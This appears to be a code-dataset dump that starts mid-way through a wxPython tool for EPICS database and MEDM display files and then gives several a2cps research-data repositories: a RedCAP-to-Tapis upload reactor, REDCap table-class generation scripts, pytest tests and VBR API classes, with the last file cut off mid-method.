height = event.GetDragRect().height
topWinHeight = max(30, min(pH-30, height))
# Because bottomWin was created first, LayoutWindow doesn't care
# about topWin's default size
#self.topWin.SetDefaultSize((-1, topWinHeight))
self.bottomWin.SetDefaultSize((-1, pH-topWinHeight))
wx.LayoutAlgorithm().LayoutWindow(self, None)
def OnSize(self, event):
#print "OnSize: height=", self.parent.GetClientSize()[1]
wx.LayoutAlgorithm().LayoutWindow(self, None)
class TopFrame(wx.Frame):
global displayInfo
def __init__(self, parent, id, title, **kwds):
wx.Frame.__init__(self, parent, id, title, **kwds)
self.width = None
self.height = None
# init data structures
self.dbd = None
if os.environ.has_key('SNAPDB_DBDFILE'):
self.dbdFileName = os.environ['SNAPDB_DBDFILE']
self.dbd = dbd.readDBD(self.dbdFileName)
else:
self.dbdFileName = "<NOT YET SPECIFIED> (Use 'File' menu to open DBD file.)"
self.displayInfoFileName = "<using internal displayInfo>"
self.recordNames = []
self.recordTypes = []
self.displayStrings = []
self.replaceTargets = []
self.replaceStrings = []
if os.environ.has_key('SNAPDB_REPLACEMENTS'):
replaceDict = parseReplacementsFromEnvString(os.environ['SNAPDB_REPLACEMENTS'])
for k in replaceDict.keys():
self.replaceTargets.append(k)
self.replaceStrings.append(replaceDict[k])
if os.environ.has_key('SNAPDB_DISPLAYINFOFILE'):
global displayInfo
self.displayInfoFileName = os.environ['SNAPDB_DISPLAYINFOFILE']
displayInfo = readDisplayInfoFile(self.displayInfoFileName)
self.EPICS_DISPLAY_PATH = ['.']
if os.environ.has_key('EPICS_DISPLAY_PATH'):
self.EPICS_DISPLAY_PATH = os.environ['EPICS_DISPLAY_PATH'].split(':')
self.fixUserCalcs = True
# make menuBar
menu1 = wx.Menu()
menu1.Append(101, "Open DBD file", "Open .dbd file")
menu1.Append(102, "Open database file", "Open database file")
menu1.Append(103, "Write database file", "Write database file")
menu1.Append(104, "Write MEDM-display file (buttons)", "Write MEDM-display file (buttons)")
menu1.Append(105, "Write MEDM-display file (composites)", "Write MEDM-display file (composites)")
menu1.Append(106, "Read displayInfo file", "Read displayInfo file")
menu1.Append(wx.ID_EXIT, "E&xit\tAlt-X", "Exit this application")
self.Bind(wx.EVT_MENU, self.on_openDBD_MenuSelection, id=101)
self.Bind(wx.EVT_MENU, self.on_openDB_MenuSelection, id=102)
self.Bind(wx.EVT_MENU, self.on_writeDB_MenuSelection, id=103)
self.Bind(wx.EVT_MENU_RANGE, self.on_writeMEDM_MenuSelection, id=104, id2=105)
self.Bind(wx.EVT_MENU, self.on_readDI_MenuSelection, id=106)
self.Bind(wx.EVT_MENU, self.on_Exit_Event, id=wx.ID_EXIT)
menuBar = wx.MenuBar()
menuBar.Append(menu1, "&File")
self.SetMenuBar(menuBar)
# make statusBar
statusBar = self.CreateStatusBar()
statusBar.SetFieldsCount(1)
self.mainPanel = MainPanel(self)
self.fillMainPanel()
def on_Exit_Event(self, event):
self.Close()
def fillMainPanel(self):
topPanel = wx.Panel(self.mainPanel.topWin, style=wx.BORDER_SUNKEN)
topPanelSizer = wx.BoxSizer(wx.VERTICAL)
topPanel.SetSizer(topPanelSizer)
text1 = wx.StaticText(topPanel, -1, ".dbd File: %s" % self.dbdFileName)
text2 = wx.StaticText(topPanel, -1, "displayInfo File: %s" % self.displayInfoFileName)
topPanelSizer.Add(text1, 0, wx.LEFT|wx.TOP, 5)
topPanelSizer.Add(text2, 0, wx.LEFT|wx.BOTTOM, 5)
workPanel = wx.Panel(topPanel, style=wx.BORDER_SUNKEN)
workPanelSizer = wx.BoxSizer(wx.HORIZONTAL)
workPanel.SetSizer(workPanelSizer)
# records panel
recordsPanel = wx.Panel(workPanel)
recordsPanelSizer = wx.BoxSizer(wx.VERTICAL)
recordsPanel.SetSizer(recordsPanelSizer)
rap = wx.Panel(recordsPanel)
rapSizer = wx.BoxSizer(wx.HORIZONTAL)
lt = wx.StaticText(rap, -1, "add new record:")
rt = wx.TextCtrl(rap, -1, "", size=(200,-1), style=wx.TE_PROCESS_ENTER)
rapSizer.Add(lt, 0, 0)
rapSizer.Add(rt, 1, 0)
rap.SetSizer(rapSizer)
self.Bind(wx.EVT_TEXT_ENTER, self.addRecordName, rt)
recordsPanelSizer.Add(rap, 0, wx.ALL, 5)
rlp = myListPanel(recordsPanel, self, "recordNames")
recordsPanelSizer.Add(rlp, 1, wx.EXPAND|wx.ALL, 5)
# replacements panel
replacementsPanel = wx.Panel(workPanel)
replacementsPanelSizer = wx.BoxSizer(wx.VERTICAL)
replacementsPanel.SetSizer(replacementsPanelSizer)
rap = wx.Panel(replacementsPanel)
rapSizer = wx.BoxSizer(wx.HORIZONTAL)
lt = wx.StaticText(rap, -1, "add new replacement\n(e.g., 'xxx=abc')")
rt = wx.TextCtrl(rap, -1, "", size=(200,-1), style=wx.TE_PROCESS_ENTER)
rapSizer.Add(lt, 0, 0)
rapSizer.Add(rt, 1, 0)
rap.SetSizer(rapSizer)
self.Bind(wx.EVT_TEXT_ENTER, self.addReplacement, rt)
replacementsPanelSizer.Add(rap, 0, wx.ALL, 5)
rlp = myListPanel(replacementsPanel, self, "replacements")
replacementsPanelSizer.Add(rlp, 1, wx.EXPAND|wx.ALL, 5)
workPanelSizer.Add(recordsPanel, 5, wx.EXPAND|wx.ALL, 5)
workPanelSizer.Add(replacementsPanel, 2, wx.EXPAND|wx.ALL, 5)
topPanelSizer.Add(workPanel, 1, wx.EXPAND|wx.ALL, 5)
self.mainPanel.Fit()
def addRecordName(self, event):
rName = str(event.GetString().split(".")[0])
if rName == "":
self.SetStatusText("empty record name")
return
if HAVE_CA:
pvName = rName+".RTYP"
try:
rType = caget(pvName)
except:
rType = "unknown"
else:
#print "rName=", rName
print "Pretending to do caget('%s')" % (rName+".RTYP")
rType = "unknown"
if rName in self.recordNames:
self.SetStatusText("'%s' is already in the list of records" % rName)
else:
self.recordNames.append(rName)
self.recordTypes.append(rType)
if rType in displayInfo.keys():
(prefix, name) = rName.split(':', 1)
replaceDict = makeReplaceDict(self.replaceTargets, self.replaceStrings)
prefix = dbd.doReplace(prefix+':', replaceDict)
name = dbd.doReplace(name, replaceDict)
del replaceDict
dString = displayInfo[rType][0] + ';'
dString += displayInfo[rType][1] + '=%s,' % prefix
dString += displayInfo[rType][2] + '=%s' % name
self.displayStrings.append(dString)
else:
#print "no displayInfo for record type '%s'" % rType
self.SetStatusText("no displayInfo for record type '%s'" % rType)
self.displayStrings.append("")
#print "add new record: ", rName
self.mainPanel.Destroy()
self.mainPanel = MainPanel(self)
self.fillMainPanel()
self.SendSizeEvent()
def addReplacement(self, event):
target, replacement = event.GetString().split("=")
#print "target, replacement =", target, replacement
self.replaceTargets.append(target)
self.replaceStrings.append(replacement)
#print "add new replacement: ", target, replacement
self.mainPanel.Destroy()
self.mainPanel = MainPanel(self)
self.fillMainPanel()
self.SendSizeEvent()
def openFile(self):
wildcard = "(*.dbd)|*.dbd|All files (*.*)|*.*"
dlg = wx.FileDialog(self, message="Choose a file",
defaultDir=os.getcwd(), defaultFile="", wildcard=wildcard,
style=wx.OPEN | wx.CHANGE_DIR)
path = None
ans = dlg.ShowModal()
if ans == wx.ID_OK:
path = dlg.GetPath()
dlg.Destroy()
return path
def on_openDBD_MenuSelection(self, event):
self.dbdFileName = self.openFile()
if self.dbdFileName:
self.mainPanel.Destroy()
self.dbd = dbd.readDBD(self.dbdFileName)
self.mainPanel = MainPanel(self)
self.fillMainPanel()
self.SendSizeEvent()
def on_openDB_MenuSelection(self, event):
global databasePath
wildcard = "(*.db)|*.db|All files (*.*)|*.*"
if databasePath == "":
databasePath = os.getcwd()
dlg = wx.FileDialog(self, message="Open ...",
defaultDir=databasePath, defaultFile="test.db", wildcard=wildcard,
style=wx.OPEN | wx.CHANGE_DIR)
ans = dlg.ShowModal()
if ans == wx.ID_OK:
databasePath = dlg.GetPath()
dlg.Destroy()
if ans == wx.ID_OK and databasePath:
self.SetCursor(wx.StockCursor(wx.CURSOR_WATCH))
replaceDict = makeReplaceDict(self.replaceTargets, self.replaceStrings)
(self.recordNames, self.recordTypes, self.displayStrings) = openDatabase(databasePath,
self.recordNames, self.recordTypes, self.displayStrings, replaceDict)
del replaceDict
self.SetCursor(wx.StockCursor(wx.CURSOR_DEFAULT))
#print "on_openDB_MenuSelection: recordNames = ", self.recordNames
self.mainPanel.Destroy()
self.mainPanel = MainPanel(self)
self.fillMainPanel()
self.SendSizeEvent()
def on_writeDB_MenuSelection(self, event):
global databasePath
if self.dbdFileName.find("<NOT") != -1:
self.SetStatusText("You have to open a .dbd file first")
return
if len(self.recordNames) <= 0:
self.SetStatusText("No records")
return
wildcard = "(*.db)|*.db|All files (*.*)|*.*"
if databasePath == "":
databasePath = os.getcwd()
dlg = wx.FileDialog(self, message="Save as ...",
defaultDir=databasePath, defaultFile="test.db", wildcard=wildcard,
style=wx.SAVE | wx.CHANGE_DIR)
ans = dlg.ShowModal()
if ans == wx.ID_OK:
databasePath = dlg.GetPath()
dlg.Destroy()
if ans == wx.ID_OK and databasePath:
replaceDict = makeReplaceDict(self.replaceTargets, self.replaceStrings)
self.SetCursor(wx.StockCursor(wx.CURSOR_WATCH))
writeNewDatabase(databasePath, self.recordNames, self.dbdFileName, replaceDict, self.fixUserCalcs)
del replaceDict
self.SetCursor(wx.StockCursor(wx.CURSOR_DEFAULT))
def on_writeMEDM_MenuSelection(self, event):
id = event.GetId()
global medmPath
if len(self.recordNames) <= 0:
self.SetStatusText("No records")
return
wildcard = "(*.adl)|*.adl|All files (*.*)|*.*"
if medmPath == "":
medmPath = os.getcwd()
dlg = wx.FileDialog(self, message="Save as ...",
defaultDir=medmPath, defaultFile="test.adl", wildcard=wildcard,
style=wx.SAVE | wx.CHANGE_DIR)
if dlg.ShowModal() == wx.ID_OK:
medmPath = dlg.GetPath()
dlg.Destroy()
if medmPath:
self.SetCursor(wx.StockCursor(wx.CURSOR_WATCH))
replaceDict = makeReplaceDict(self.replaceTargets, self.replaceStrings)
if id == 104:
writeNewMEDM_RDButtons(medmPath, self.recordNames, self.recordTypes, self.displayStrings, replaceDict, self.EPICS_DISPLAY_PATH)
else:
writeNewMEDM_Composites(medmPath, self.recordNames, self.recordTypes, self.displayStrings, replaceDict, self.EPICS_DISPLAY_PATH)
del replaceDict
self.SetCursor(wx.StockCursor(wx.CURSOR_DEFAULT))
def on_readDI_MenuSelection(self, event):
global displayInfo
wildcard = "(*.txt)|*.txt|All files (*.*)|*.*"
diPath = os.getcwd()
dlg = wx.FileDialog(self, message="Open ...",
defaultDir=diPath, defaultFile="displayInfo.txt", wildcard=wildcard, style=wx.OPEN)
ans = dlg.ShowModal()
if ans == wx.ID_OK:
diPath = dlg.GetPath()
dlg.Destroy()
if ans == wx.ID_OK and diPath:
self.mainPanel.Destroy()
self.displayInfoFileName = diPath
displayInfo = readDisplayInfoFile(diPath)
self.mainPanel = MainPanel(self)
self.fillMainPanel()
self.SendSizeEvent()
def main():
app = wx.PySimpleApp()
frame = TopFrame(None, -1, 'dbd', size=(800,400))
#frame = TopFrame(None, -1, 'dbd')
frame.Center()
(hS, vS) = frame.GetSize()
(hP, vP) = frame.GetPosition()
frame.width = (hP + hS/2)*2
frame.height = (vP + vS/2)*2
frame.SetMaxSize((frame.width, frame.height))
frame.Show(True)
app.MainLoop()
if __name__ == "__main__":
main()
``` |
{
"source": "a2cps/blood-api-manager",
"score": 2
} |
#### File: a2cps/blood-api-manager/reactor.py
```python
from reactors.runtime import Reactor
import datetime
import simplejson as json
import os
import requests
import shutil
import time
def slack_notify(message, reactor):
if reactor.settings.get('workflow', {}).get('notify', True):
try:
reactor.client.actors.sendMessage(
actorId=reactor.settings.links.slackbot,
body={
'message': '{0}: {1}'.format(reactor.actor_name, message)
})
except Exception as exc:
            reactor.logger.warn(
                'Failed to send Slack notification from {0}: {1}'.format(
                    reactor.actor_name, exc))
else:
reactor.logger.info(
'Skipped sending Slack notification from {0}'.format(
reactor.actor_name))
def main():
r = Reactor(tapis_optional=True)
# Generate timestamp
timestamp = time.strftime("%Y%m%dT%H%M%SZ", time.gmtime())
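    # Illustrative value (clock assumed): 2022-03-01 18:04:05 UTC yields
    # "20220301T180405Z"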
for mcc in r.settings.mccs:
save_api(mcc, timestamp, r)
def redact_data(json_data: dict):
"""Placeholder for deny-list redaction
"""
return json_data
def save_api(mcc: int, timestamp: str, r: object):
timestamp_filename = os.path.join(
os.getcwd(), '{0}-{1}-{2}.json'.format(r.settings.tapis.filename, mcc,
timestamp))
latest_filename = os.path.join(
os.getcwd(), '{0}-{1}-{2}.json'.format(r.settings.tapis.filename, mcc,
'latest'))
files_to_upload = [timestamp_filename, latest_filename]
try:
r.logger.debug('Retrieving MCC {0} data from RedCAP'.format(mcc))
tok = os.environ.get('REDCAP_TOKEN',
'<KEY>')
headers = {'Token': tok}
data = {'op': 'blood', 'mcc': mcc}
resp = requests.post(r.settings.redcap.custom_api,
headers=headers,
data=data)
resp.raise_for_status()
data = resp.json()
r.logger.debug('RedCAP data retrieved.')
except Exception as exc:
slack_notify('Data retrieval from RedCAP failed: {0}'.format(exc), r)
r.on_failure(exc)
# Redact sensitive fields from API response
data = redact_data(data)
# Dump JSON data to timestamped file
with open(timestamp_filename, 'w') as jf:
json.dump(data, jf, separators=(',', ':'))
# Make a copy as 'latest'
shutil.copy2(timestamp_filename, latest_filename)
# Upload files via Tapis files
if r.settings.get('workflow', {}).get('upload', True):
r.logger.debug('Uploading files... ' + str(files_to_upload))
try:
for fn in files_to_upload:
r.logger.info('File {0}'.format(fn))
r.client.files.importData(
systemId=r.settings.tapis.storage_system,
filePath=r.settings.tapis.path,
fileToUpload=open(fn, 'rb'))
# Grant permission
r.logger.info('Setting ACL')
body = {
'username': r.settings.tapis.username,
'permission': r.settings.tapis.pem
}
report_path = os.path.join(r.settings.tapis.path,
os.path.basename(fn))
r.client.files.updatePermissions(
systemId=r.settings.tapis.storage_system,
filePath=report_path,
body=body)
except Exception as exc:
slack_notify('File uploads failed: {0}'.format(exc), r)
r.on_failure(exc)
else:
r.logger.info('Skipping uploads')
slack_notify(
'Blood Draw API data for MCC {0} was processed'.format(mcc), r)
if __name__ == '__main__':
main()
``` |
{
"source": "a2cps/python-vbr",
"score": 2
} |
#### File: scripts/data/__init__.py
```python
import glob
import inspect
import os
from vbr.pgrest import table
from vbr.tableclasses import class_from_table
from .anatomy import AnatomyData
from .assay_type import AssayTypeData
from .biosample import BiosampleData
from .contact import ContactData
# from .box_type import BoxTypeData
from .container import ContainerData
from .container_type import ContainerTypeData
from .data_event import DataEventData
from .data_type import DataTypeData
from .dataset import DatasetData
from .file import FileData
from .file_format import FileFormatData
from .loader import TableData
from .location import LocationData
from .measurement_type import MeasurementTypeData
from .organization import OrganizationData
from .project import ProjectData
from .project_in_project import ProjectInProjectData
from .protocol import ProtocolData
from .reason import ReasonData
from .role import RoleData
from .status import StatusData
from .subject import SubjectData
from .unit import UnitData
# __all__ = ['data_loads']
def _classes():
"""Private: Return the list of table data classes via Python inspection"""
    import sys
classlist = []
for _, obj in inspect.getmembers(sys.modules[__name__]):
if inspect.isclass(obj):
if TableData in obj.__bases__:
                # Exclude the TableData base class itself, which inspection
                # picks up alongside its concrete subclasses
                if obj.__name__ != "TableData":
classlist.append(obj)
return tuple(classlist)
def class_from_name(table_name: str) -> TableData:
"""Return table data class by table class name"""
for c in _classes():
try:
if c.__name__ == table_name:
return c
except Exception:
pass
def data_classes(table_definitions: list) -> list:
ordered = []
for t in table_definitions:
tdef_name = t["table_name"]
tdef_classname = class_from_table(t["table_name"]).__name__
cl = class_from_name(tdef_classname + "Data")
if cl is not None:
ordered.append(cl)
return ordered
def data_loads(table_definition: list) -> list:
"""Return dependency-ordered list of data objects to load"""
ordered = []
oc = data_classes(table_definition)
for c in oc:
for rec in c().records:
ordered.append(rec)
return ordered
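# Illustrative usage (caller and variable names assumed): given table
# definitions loaded elsewhere,
#   records = data_loads(table_definitions)
# returns record objects in dependency order, so they can be inserted into
# PgREST one after another without violating foreign-key constraints.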
def redcap_data_dictionaries() -> list:
"""Return paths to REDcap *DataDictionary* files from 'data' directory"""
base = os.path.dirname(__file__)
return glob.glob(os.path.join(base, "*DataDictionary*"), recursive=False)
```
#### File: src/scripts/dump_tables.py
```python
def main(args):
t = Tapis(
base_url=args["base_url"], username=args["username"], password=args["password"]
)
t.get_tokens()
v = VBR(tapis_client=t)
if len(args["table_name"]) > 0:
to_export = args["table_name"]
else:
to_export = [t["table_name"] for t in v.list_tables()]
dumps_dir = args.get("dumps_dir", None)
if dumps_dir is None:
# target is "exports" directory at top level of python-vbr
dumps_dir = exports_directory()
    for table_name in to_export:
        print("Exporting {0}".format(table_name))
        filename = os.path.join(dumps_dir, ".".join([table_name, "csv"]))
        data = [r.dict() for r in v.list_rows(root_url=table_name, limit=100000)]
if len(data) > 0:
keys = data[0].keys()
with open(filename, "w", newline="") as output_file:
dict_writer = csv.DictWriter(output_file, keys)
dict_writer.writeheader()
dict_writer.writerows(data)
if __name__ == "__main__":
import csv
import os
from tapipy.tapis import Tapis
from vbr import tableclasses
from vbr.client import VBR
from .cli import exports_directory, get_parser
from .data import data_loads
parser = get_parser()
parser.add_argument(
"-O", "--dumps-dir", dest="dumps_dir", help="Dumps directory [exports]"
)
parser.add_argument("table_name", nargs="*", help="Optional: Table Name(s)")
args = parser.parse_args()
main(vars(args))
```
#### File: src/scripts/redcap_classfiles.py
```python
def choices_to_dict(choices_str: str) -> dict:
# REDcap choices are expressed as pipe-delimited sets of comma-delim values
#
# Used to populate dropdown, checkbox, or slider types
#
# Example: 1, Yes | 0, No
# Example: 0, 0 | .25, 0.25 | .5, 0.5 | 1, 1 | 2, 2 | 4, 4 | 8, 8
# Example: 1, Unable to obtain blood sample -technical reason | 2, Unable to obtain blood sample -patient related | 3, Sample handling/processing error
cdict = {}
for i in choices_str.split("|"):
i = i.strip()
ii = i.split(",")
if len(ii) > 1:
k = ii[0].strip()
v = ii[1].strip()
cdict[k] = v
return cdict
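# Illustrative behavior (derived from the parsing above, not in the source):
#   choices_to_dict("1, Yes | 0, No")   -> {"1": "Yes", "0": "No"}
#   choices_to_dict("0, 0 | .25, 0.25") -> {"0": "0", ".25": "0.25"}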
def choices_are_integer(choices_str: str) -> bool:
cdict = choices_to_dict(choices_str)
for k, _ in cdict.items():
try:
res = int(k)
except ValueError:
return False
return True
def choices_are_numeric(choices_str: str) -> bool:
cdict = choices_to_dict(choices_str)
for k, _ in cdict.items():
try:
res = float(k)
except ValueError:
return False
return True
def choices_are_boolean(choices_str: str) -> bool:
cdict = choices_to_dict(choices_str)
values = []
for k, _ in cdict.items():
try:
res = int(k)
values.append(res)
except ValueError:
return False
if len(values) > 2 or len(values) < 1:
return False
for v in values:
if v not in [0, 1]:
return False
return True
def choices_are_yesno(choices_str: str) -> bool:
cdict = choices_to_dict(choices_str)
values = []
for k, _ in cdict.items():
values.append(k)
if len(values) != 2:
return False
for v in values:
if v not in ["Y", "N"]:
return False
return True
def process_data_dict(filename: str, current: dict = None) -> dict:
"""Convert a REDcap Data Dictionary into a minimally processed, actionable Python dict"""
# {form_name: { field_name: {}}}
if current is None:
ddict = {}
else:
ddict = current
with open(filename, "r") as csvfile:
ddreader = csv.reader(csvfile)
# Strip header
headers = next(ddreader, None)
for row in ddreader:
# Form Name
form_name = row[1]
# Variable / Field Name
var_field_name = row[0]
# Field Type
field_type = row[3]
# Field Label
field_label = row[4]
# Choices
choices = row[5]
# Identifier
identifier = row[10]
if identifier == "y":
identifier = True
else:
identifier = False
if form_name != "" and var_field_name != "":
if (
field_type in SUPPORTED_STRING_TYPES
or field_type in SUPPORTED_FREETEXT_TYPES
):
# print('{0}.{1}'.format(form_name, var_field_name))
ddict_entry = {
"field_type": field_type,
"field_label": field_label,
"choices": choices,
"identifier": identifier,
"source": os.path.basename(filename),
}
if form_name not in ddict:
ddict[form_name] = {}
ddict[form_name][var_field_name] = ddict_entry
return ddict
def build(args):
logging.info("Building REDcap tableclass files...")
DEST_DIR = os.path.join(os.path.dirname(redcap.__file__), "autogenerated")
TEMPLATES_DIR = os.path.join(os.path.dirname(__file__), "templates")
# Ensure class files destination exists
Path(DEST_DIR).mkdir(parents=True, exist_ok=True)
ddict = {}
for dd in redcap_data_dictionaries():
ddict = process_data_dict(filename=dd, current=ddict)
init_dict = {}
for form_name, form_config in ddict.items():
# Set up class def skeleton
submodule_name = form_name
# acute_phase_trajectory_items_v01_6month_daily => RcapAcutePhaseTrajectoryItemsV016MonthDaily
class_name = "Rcap" + snake_to_camel_case(form_name)
# acute_phase_trajectory_items_v01_6month_daily => Acute Phase Trajectory Items V01 6Month Daily
class_docstring = snake_to_title_string(form_name)
autogen_string = "Autogenerated {0} by {1}".format(
datetime.today().isoformat(), os.path.basename(__file__)
)
keyvals = {
"redcap_form_name": form_name,
"class_name": class_name,
"docstring": class_docstring,
"module_docstring": autogen_string,
"parent_class_name": "RcapTable",
}
# Extend class def with column entries
keyvals["columns"] = {}
for col_name, col_config in form_config.items():
if col_config.get("field_type", None) in SUPPORTED_STRING_TYPES:
col_type = "String"
elif col_config.get("field_type", None) in SUPPORTED_FREETEXT_TYPES:
col_type = "FreeText"
#####################
# Translation rules #
#####################
# Columns are always nullable (at least
# until we decide what columns are mandatory)
col_nullable = "True"
# Empty default comment
col_comments = []
# Type shifts
if col_name == "guid":
col_type = "GUID"
if col_config.get("field_type", None) == "yesno":
col_type = "Boolean"
# Process 'Choices' field
col_choices = col_config.get("choices", "")
# Try to override type to be more descriptive of field value
# based on choices available in REDcap form
if col_choices != "":
# TODO Implement casting/handling of string, numeric values to 1/0
if choices_are_boolean(col_choices) or choices_are_yesno(col_choices):
col_type = "Boolean"
elif choices_are_integer(col_choices):
col_type = "Integer"
elif choices_are_numeric(col_choices):
col_type = "Numeric"
# Property source code comments
col_label = col_config.get("field_label", "")
# Handle empty field name
if col_label == "":
col_label = "Field Name was empty in Data Dictionary"
# Ignore multiline field names
if len(col_label.splitlines()) > 1:
col_label = "Ignored multiline Field Name in Data Dictionary"
# Strip leading numeric
            col_label = re.sub(r"^[0-9]+\.", "", col_label)
# Strip leading/trailing whitespace
col_label = col_label.strip()
# Strip HTML tags
if col_label.startswith("<"):
# col_label = 'Ignored HTML Field Name'
col_label = re.sub("<[^<]+?>", "", col_label)
# Strip trailing : character
if col_label.endswith(":"):
col_label = re.sub(":$", "", col_label)
# Truncate label to 64 chars
if len(col_label) > 64:
col_label = col_label[:61] + "..."
# Strip trailing whitespace
col_label = col_label.rstrip("\n")
# Comments list is turned into source code comments in classfile
col_comments.append(col_label)
col_comments.append("Field Type: {0}".format(col_config.get("field_type")))
if len(col_choices) <= 1:
col_choices = "N/A"
col_comments.append("Choices: {0}".format(col_choices))
# Template rendering data
keyvals["columns"][col_name] = {
"comments": col_comments,
"docstring": col_label,
"nullable": col_nullable,
"type": col_type,
}
# Render and write the class file from Jinja template
with open(os.path.join(TEMPLATES_DIR, CLASS_TEMPLATE)) as tf:
template = Template(tf.read())
output = template.render(**keyvals)
with open(os.path.join(DEST_DIR, submodule_name + ".py"), "w") as cf:
cf.write(output)
cf.close()
# Supports writing 'from <submodule> import <classname> in __init__.py
init_dict[submodule_name] = class_name
# Render and write the class file from Jinja template
with open(os.path.join(TEMPLATES_DIR, INIT_TEMPLATE)) as tf:
template = Template(tf.read())
imports = {"imports": init_dict}
output = template.render(imports)
with open(os.path.join(DEST_DIR, "__init__.py"), "w") as cf:
cf.write(output)
cf.close()
logging.info("Done")
def clean(args):
logging.info("Cleaning REDcap tableclass files...")
DEST_DIR = os.path.join(os.path.dirname(redcap.__file__), "autogenerated")
TEMPLATES_DIR = os.path.join(os.path.dirname(__file__), "templates")
# Ensure class files destination exists
Path(DEST_DIR).mkdir(parents=True, exist_ok=True)
# Delete any *.py files in DEST_DIR
for pyfile in glob.glob(DEST_DIR + "/*.py"):
os.unlink(pyfile)
# Write empty __init__.py
with open(os.path.join(TEMPLATES_DIR, INIT_TEMPLATE)) as tf:
template = Template(tf.read())
imports = {
"module_docstring": "Intentionally empty as class files have not been generated",
"imports": {},
}
output = template.render(imports)
with open(os.path.join(DEST_DIR, "__init__.py"), "w") as cf:
cf.write(output)
cf.close()
logging.info("Done")
def main(args):
if args["cmd"] == "build":
build(args)
elif args["cmd"] == "clean":
clean(args)
if __name__ == "__main__":
import argparse
import collections
import csv
import glob
import logging
import os
import re
from datetime import datetime
from pathlib import Path
import simplejson as json
from jinja2 import Template
from vbr.pgrest.utils import snake_to_camel_case, snake_to_title_string
from vbr.tableclasses import redcap
from .cli import get_parser
from .data import redcap_data_dictionaries
CLASS_TEMPLATE = "redcap_tableclass.py.j2"
INIT_TEMPLATE = "redcap_tableclasses_init.py.j2"
SUPPORTED_STRING_TYPES = ["text", "radio", "dropdown", "checkbox", "yesno"]
SUPPORTED_FREETEXT_TYPES = ["notes"]
parser = get_parser()
parser.add_argument(
"cmd", nargs="?", choices=["build", "clean"], default="build", help="Command"
)
args = parser.parse_args()
main(vars(args))
```
#### File: src/tests/test_700_utils_helpers_redcaptasks.py
```python
import pytest
import vbr
def test_redcap_event_to_vbr_protocol():
assert (
vbr.utils.redcaptasks.redcap_event_to_vbr_protocol("informed_consent_arm_1")
== 2
)
def test_redcap_event_to_vbr_protocol_valuerror():
with pytest.raises(ValueError):
vbr.utils.redcaptasks.redcap_event_to_vbr_protocol("deadbeef")
def test_redcap_event_id_to_unique_event_name():
assert (
vbr.utils.redcaptasks.redcap_event_id_to_unique_event_name(41)
== "informed_consent_arm_1"
)
def test_redcap_event_id_to_unique_event_name_valuerror():
with pytest.raises(ValueError):
vbr.utils.redcaptasks.redcap_event_id_to_unique_event_name(-1)
@pytest.mark.parametrize("test_input,expected", [("14", "2"), ("29", "3"), ("25", "1")])
def test_redcap_project_id_to_vbr_project(test_input, expected):
assert vbr.utils.redcaptasks.redcap_to_vbr_project_id(test_input) == expected
@pytest.mark.parametrize(
"test_input,expected",
[
("2001-04-12 19:03", "2001-04-13T01:03:00.000000Z"),
("2001-04-12 19:03:24", "2001-04-13T01:03:24.000000Z"),
("2001-04-12 19:03:24.000001", "2001-04-13T01:03:24.000001Z"),
("2001-04-12", None),
("2001-04-12T19:03:24", "2001-04-13T01:03:24.000000Z"),
],
)
def test_redcap_to_pgrest_datetime(test_input, expected):
if expected is None:
with pytest.raises(ValueError):
vbr.utils.redcaptasks.redcap_to_pgrest_datetime(test_input)
else:
assert vbr.utils.redcaptasks.redcap_to_pgrest_datetime(test_input) == expected
@pytest.mark.parametrize("test_input,expected", [("1", "11"), (1, "11"), ("100", "0")])
def test_redcap_shipping_mcc_to_vbr_location(test_input, expected):
assert (
vbr.utils.redcaptasks.redcap_shipping_mcc_to_vbr_location(test_input)
== expected
)
@pytest.mark.parametrize(
"test_input,expected", [("1", "2"), (1, "2"), ("4", "3"), (100, "0")]
)
def test_redcap_shipping_mcc_to_vbr_project(test_input, expected):
assert (
vbr.utils.redcaptasks.redcap_shipping_mcc_to_vbr_project(test_input) == expected
)
@pytest.mark.parametrize(
"test_input,expected", [("rush_university_me", "11"), ("torchys_tacos", "0")]
)
def test_redcap_data_access_group_to_vbr_location(test_input, expected):
assert (
vbr.utils.redcaptasks.redcap_data_access_group_to_vbr_location(test_input)
== expected
)
```
#### File: vbr/api/container.py
```python
from vbr.tableclasses import Container
__all__ = ["ContainerApi"]
class ContainerApi(object):
def get_container(self, pkid: str) -> Container:
"""Retrieve a Container by primary identifier."""
return self._get_row_from_table_with_id("container", pkid)
def get_container_by_local_id(self, local_id: str) -> Container:
"""Retrieve a Container by local_id."""
return self._get_row_from_table_with_local_id("container", local_id)
def get_container_by_tracking_id(self, tracking_id: str) -> Container:
"""Retrieve a Container by tracking_id."""
return self._get_row_from_table_with_tracking_id("container", tracking_id)
def create_container(
self,
tracking_id: str,
project_id: int,
container_type_id: int,
location_id: int = 1,
status_id: int = 10, # Created
parent_id: int = 0, # Root container
) -> Container:
"""Create a new Container."""
container_type_id = str(container_type_id)
location_id = str(location_id)
ct = Container(
tracking_id=tracking_id,
container_type=container_type_id,
location=location_id,
status=status_id,
)
try:
return self.vbr_client.create_row(ct)[0]
except Exception:
raise
def create_or_get_container_by_tracking_id(
self,
tracking_id: str,
project_id: int,
container_type_id: int,
location_id: int = 1,
status_id: int = 10, # Created
parent_id: int = 0, # Root container
) -> Container:
"""Create a Container or return existing with specified tracking_id."""
try:
return self.create_container(
tracking_id,
project_id,
container_type_id,
location_id,
status_id,
parent_id,
)
except Exception:
return self.get_container_by_tracking_id(tracking_id)
```
#### File: vbr/api/manage_status.py
```python
from vbr.tableclasses import (
Container,
Measurement,
Shipment,
Status,
Table,
SysEvent,
)
from .data_event import DataEventApi
from .status import StatusApi
__all__ = ["ManageStatusApi"]
class ManageStatusApi(object):
def _status_from_status_name(self, status_name: str, table_name: str) -> Status:
"""Returns a Status for a valid status and table name."""
status_name = status_name.lower()
status_prefix = table_name + "."
if not status_name.startswith(status_prefix):
status_name = status_prefix + status_name
try:
return StatusApi.get_status_by_name(self, status_name)
except ValueError:
raise ValueError("Unrecognized %s status %s", table_name, status_name)
def _update_row_status(
self, vbr_row: Table, status: Status, comment: str = None
) -> Table:
"""Update a VBR row with the provided Status"""
if getattr(vbr_row, "status", None) is None:
            raise ValueError(
                "Cannot update status of <{0}> object".format(
                    vbr_row.__schema__.table_name
                )
            )
new_status_id = status.status_id
ori_status_id = vbr_row.status
if new_status_id != ori_status_id:
vbr_row.status = new_status_id
vbr_row = self.vbr_client.update_row(vbr_row)
DataEventApi.create_and_link(
self,
status_id=new_status_id,
comment=comment,
link_target=vbr_row,
)
return vbr_row
def update_container_status_by_name(
self, container: Container, status_name: str, comment: str = None
) -> Container:
